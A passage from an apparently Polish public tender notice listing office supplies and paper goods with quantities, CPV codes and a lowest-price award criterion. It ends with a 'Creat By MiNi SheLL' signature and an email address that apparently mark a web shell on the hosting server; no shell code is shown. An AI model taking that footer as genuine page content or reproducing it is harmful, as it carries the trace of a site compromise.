63.	Linijka 20 cm przezroczyste, plastikowe, gwarantowana dokładność wykonania skali i trwałość podziałki		szt.	20
64.	Linijka 30 cm przezroczysta plastikowa, gwarantowana dokładność wykonania skali i trwałość podziałki		szt.	10
65.	Linijka 40 cm przezroczysta plastikowa, gwarantowana dokładność wykonania skali i trwałość podziałki		szt.	5
66.	Linijka 50 cm przezroczysta plastikowa, gwarantowana dokładność wykonania skali i trwałość podziałki		szt.	5
67.	Magnesy do tablic różne kolory (12 szt w opakowaniu)		op	5
68.	Marker, permanentny, wodoodporny, średnica (F) okrągła końcówka, z tłoczkiem, płynny tusz, dostępny w min. czterech kolorach: czarny, czerwony, niebieski, zielony 		szt.	500
69.	Marker, suchościeralny, kolor czarny, nie wysycha bez skuwki do kilku dni, szybkoschnący bez zapachowy, grubość linii ok. 2mm, okrągła końcówka		szt.	5
70.	Nożyczki 15,5 cm		szt.	10
71.	Nożyczki 25 cm		szt.	10
72.	Ofertówka przezroczysta sztywna, z twardej folii PCV, zgrzewana w kształcie L, wyposażona w perforacją umożliwiającą wpięcie do segregatora		szt.	1500
73.	Ofertówka przezroczysta sztywna, z twardej folii PCV, zgrzewana w kształcie L, z wycięciem ułatwiającym wyjmowanie dokumentów, format A4		szt.	1200
74.	Okładka do termobindowania (do termobindownicy Opus TB250), format A4, szer.grzbietu 1,5mm (mini), przednia okładka z pcv przezroczysta, tylna wykonana z błyszczącego kartonu		szt.	100
75.	Okładka do termobindowania (do termobindownicy Opus TB250), format A4, szer.grzbietu 10mm, przednia okładka z pcv przezroczysta, tylna wykonana z błyszczącego kartonu		szt.	25
76.	Okładka do termobindowania (do termobindownicy Opus TB250), format A4, szer.grzbietu 3mm, przednia okładka z pcv przezroczysta, tylna wykonana z błyszczącego kartonu		szt.	100
77.	Okładka do termobindowania (do termobindownicy Opus TB250), format A4, szer.grzbietu 6mm, przednia okładka z pcv przezroczysta, tylna wykonana z błyszczącego kartonu		szt.	100
78.	Okładki do bindowania A4, karton, gramatura min. 250 g/m2 faktura skóropodobna, dostępne min. w 4 kolorach (opakowanie 100 szt.)		op.	4
79.	Ołówek z gumką odporny na złamania, twardość: 2B		szt.	200
80.	Ołówek zwykły z gumką odporny na złamania, twardość: HB		szt.	150
81.	Pinezki do tablic korkowych minimum w pięciu kolorach (min. 50 szt. w opakowaniu)		op.	10
82.	Pisak - mazak cienkopiszący,długość linii pisania min.900 m, występujący w minimum 4 kolorach: czarny, czerwony, niebieski, zielony  		szt.	500
83.	Pisak grubopiszący występujący w minimum 4 kolorach: czarny, czerwony, niebieski, zielony		szt.	400
84.	Płyty CD-R Verbatim 700MB, 52x, w pudełkach slim, lub równoważny		szt.	100
85.	Płyty DVDR Verbatim 4,7GB, 16x,  w pudełkach slim, lub równoważny		szt.	50
86.	Płyty DVDR Verbatim lub TDK lub Maxell 4,7GB, 16x,  printable		szt.	48000
87.	Przekładki z polipropylenu A4 do segregowania dokumentów z uniwersalną perforacją brzegu, z kolorowymi wzmocnionymi indeksami alfabetycznymi (a-z) z kartą informacyjno-opisową		op.	5
88.	Przekładki z polipropylenu A4 do segregowania dokumentów z uniwersalną perforacją brzegu, z kolorowymi wzmocnionymi indeksami numerycznymi (1-12) z kartą informacyjno-opisową		op.	5
89.	Przekładki z polipropylenu A4 do segregowania dokumentów z uniwersalną perforacją brzegu, z kolorowymi wzmocnionymi indeksami numerycznymi (1-31) z kartą informacyjno-opisową		op.	5
90.	Segregator A4 z metalową dźwignią i dociskiem, szerokość grzbietu min 50mm wykonany z grubego kartonu pokryty z zewnątrz folią polipropylenową, wzmocniony otwór na palec, wzmocnione dolne krawędzie, wymienna dwustronna etykieta grzbietowa 		szt.	100
91.	Segregator A4 z metalową dźwignią i dociskiem, szerokość grzbietu min 70mm wykonany z grubego kartonu pokryty z zewnątrz folią polipropylenową, wzmocniony otwór na palec, wzmocnione dolne krawędzie, wymienna dwustronna etykieta grzbietowa 		szt.	400
92.	Segregator A5 z metalową dźwignią i dociskiem, szerokość grzbietu min 35-50mm wykonany z grubego kartonu pokryty z zewnątrz folią polipropylenową, wzmocniony otwór na palec, wzmocnione dolne krawędzie, wymienna dwustronna etykieta grzbietowa 		szt.	5
93.	Skoroszyt A4 biały, karton o gramaturze min 250 g/m2, metalowa zawieszka		szt.	250
94.	Skoroszyt A4 plastikowy wykonany z mocnego i sztywnego PCV, przednia okładka przezroczysta sztywna, druga kolorowa, wymienny wysuwany pasek na opisy		szt.	50
95.	Skoroszyt A4 plastikowy wykonany z mocnego i sztywnego PCV, przednia okładka przezroczysta sztywna, druga kolorowa, wymienny wysuwany pasek na opisy, boczna perforacja umożliwiająca wpinanie do segregatora		szt.	1500
96.	Skorowidz alfabetyczny A4, twarda oprawa, szyty min. 96 kartek		szt.	40
97.	Skorowidz alfabetyczny A5, twarda oprawa, szyty min. 96 kartek		szt.	30
98.	Spinacz archiwizacyjny dwuczęściowy, plastikowy do archiwizacji dokumentów, umożliwia szybkie i łatwe przeniesienie dokumentów z segregatora (op 100 szt)		op	20
99.	Spinacze metalowe krzyżowe 41 mm (opakowanie 50 szt.)		op.	10
100.	Spinacze metalowe krzyżowe 70 mm (opakowanie 12 szt.)		op.	10
101.	Spinacze metalowe okrągłe 28 mm (opakowanie 100 szt.)		op.	550
102.	Spinacze metalowe okrągłe 50 mm (opakowanie 100 szt.)		op.	50
103.	Taśma do metkownicy 22x12mm prosta zielona do metkownicy BEST 2212-8 jednorzędowy		szt.	5
104.	Taśma klejąca biurowa przezroczysta 24 mm x 20 m		szt.	200
105.	Taśma pakowa 48 mm x 46 m brązowa		szt.	60
106.	Taśma pakowa 48 mm x 46 m przezroczysta		szt.	130
107.	Teczka do podpisu 20 kartek, oprawa introligatorska skóropodobnym tworzywem, grzbiet harmonijkowy, wewnętrzne karty z dziurkami		szt.	3
108.	Teczka do podpisu 30 kartek, oprawa introligatorska skóropodobnym tworzywem, grzbiet harmonijkowy, wewnętrzne karty z dziurkami		szt.	3
109.	Teczka kopertowa plastikowa wiązana A4 wykonana z trwałego półprzezroczystego tworzywa, pojemność 200 kartek		szt.	500
110.	Teczka ofertowa , format A4, przednia kieszeń z folii wysokoprzezroczystej PVC umożliwiające włożenie opisu lub strony tytułowej, na grzbiecie papierowy pasek na opis, tylna ściana sztywna pokryta folią PVC, zawiera wąsy metalowe do wpinania dokumentów, dostępne w min. 4 kolorach  		szt.	100
111.	Teczka wiązana A4 biała, kartonowa, wyposażona w tasiemki posiadające trzy wewnętrzne skrzydła zabezpieczające dokumenty przed wypadnięciem		szt.	350
112.	Teczka wiązana A4 plastikowa, wyposażona w tasiemki,  posiadające trzy wewnętrzne skrzydła zabezpieczające dokumenty przed wypadnięciem		szt.	300
113.	Teczka z gumką A4 kolorowa, kartonowa o gramaturze min. 300 g/m2 lakierowana, posiadająca trzy wewnętrzne skrzydła zabezpieczające dokumenty przed wypadnięciem 		szt.	800
114.	Temperówki plastikowe z pojemnikiem do ołówków i kredek w tradycyjnym rozmiarze		szt.	20
115.	Torebki strunowe wymiary 120x180mm (op 100 szt.)		op	17
116.	Torebki strunowe wymiary 150x200mm (op 100 szt.)		op	10
117.	Torebki strunowe wymiary 200x250mm (op 100 szt.)		op	5
118.	Torebki strunowe wymiary 250x300mm (op 100 szt.)		op	10
119.	Tusz kreślarski na papier i folię czarny , poj. min. 22ml. 		szt.	20
120.	Tusze do pieczątek automatycznych ,  buteleczka o poj. min. 25 ml z końcówką ułatwiającą nasączanie poduszek,  dostępny w kolorach czarny, czerwony, niebieski, zielony, fiolet		szt.	100
121.	Wąsy do skoroszytów - paski skoroszytowe z metalowymi wąsami i plastikową listewką dociskową		szt.	25000
122.	Wkłady do długopisu, długość linii pisania min.1700 m,  występujące w minimum 4 kolorach: czarny, czerwony, niebieski, zielony do długopisu w pozycji 6.		szt.	400
123.	Wkład do długopisu, metalowy wkład wielkopojemny z niebieskim tuszem  do długopisu w pozycji 7.		szt.	200
124.	Wkłady do segregatorów papierowe w kratkę pasujące do każdego rodzaju segregatorów - format A5 (op 50 szt)		op	10
125.	Zakładki indeksujące  służące do zaznaczania stron w bloczku 4x50 kartek, rozm. 20x50mm		op.	240
126.	Zakreślacz  ze ściętą końcówką, linia zakreślania   1-5 mm występujący w minimum 5 kolorach 		szt.	200
127.	Zeszyt w miękkiej oprawie A5, min. 60 kartek, kratka		szt.	180
128.	Zeszyt w twardej oprawie A4, min. 96 kartek, kratka		szt.	280
129.	Zeszyt w twardej oprawie A5, min. 96 kartek, kratka		szt.	240
130.	Zszywacz metalowy, zszywa do 12 kartek  zszywkami 24/6 możliwość zaginania zszywek do wewnątrz lub na zewnątrz, głębokość zszywania 51mm		szt.	30
131.	Zszywki 23/13 (opakowanie 1000 szt.)		op.	3
132.	Zszywki 23/17 (opakowanie 1000 szt.)		op.	3
133.	Zszywki 23/24 (opakowanie 1000 szt.)		op.	3
134.	Zszywki 23/8 (opakowanie 1000 szt.)		op.	3
135.	Zszywki 24/6 (opakowanie 1000 szt.)		op.	500
136.	Zszywki model 10 FIAN (opakowania 1000 szt.) lub równoważne		op	3
137.	Zwilżacz wodny - maczałki do palców, posiadają gąbkę do nasączania wodą		szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywna dostawa artykułów papierniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Papier biurowy kolorowy do kserokopiarek i drukarek, format A4, gramatura 80g/m2, kolor błękit  (500 arkuszy w ryzie)		ryza	65
2.	Papier biurowy kolorowy do kserokopiarek i drukarek, format A4, gramatura 80g/m2, kolor lila  (500 arkuszy w ryzie)		ryza	85
3.	Papier biurowy kolorowy do kserokopiarek i drukarek, format A4, gramatura 80g/m2, kolor pomarańczowy  (500 arkuszy w ryzie)		ryza	60
4.	Papier biurowy kolorowy do kserokopiarek i drukarek, format A4, gramatura 80g/m2, kolor szary  (500 arkuszy w ryzie)		ryza	50
5.	Papier biurowy kolorowy do kserokopiarek i drukarek, format A4, gramatura 80g/m2, kolor zieleń  (500 arkuszy w ryzie)		ryza	100
6.	Papier biurowy kolorowy do kserokopiarek i drukarek, format A4, gramatura 80g/m2, kolor żółty  (500 arkuszy w ryzie)		ryza	80
8.	Papier komputerowy format 240x1x12 składanka pojedyncza biała (ilość składek w kartonie 2000), gramatura 70g/m2		karton	8
9.	Papier komputerowy format 240x3x12 składanka potrójna, oryginał biały, kopie kolorowe  (ilość składek w kartonie 600)		karton	5
10.	Papier ozdobny kremowy, format A4, gramatura 200-246g/m2, do druku wizytówek, dyplomów, certyfikatów (25 arkuszy w opakowaniu)		op	10
11.	Rolki faxowe termiczne 216mm x 30m		szt	40
12.	Rolki termiczne do kas fiskalnych 57mm x 20m		szt	600
13.	Rolki termiczne 59mm x 30m		szt	30
14.	Rolki termiczne z papieru termoczułego 110mmx30m		szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com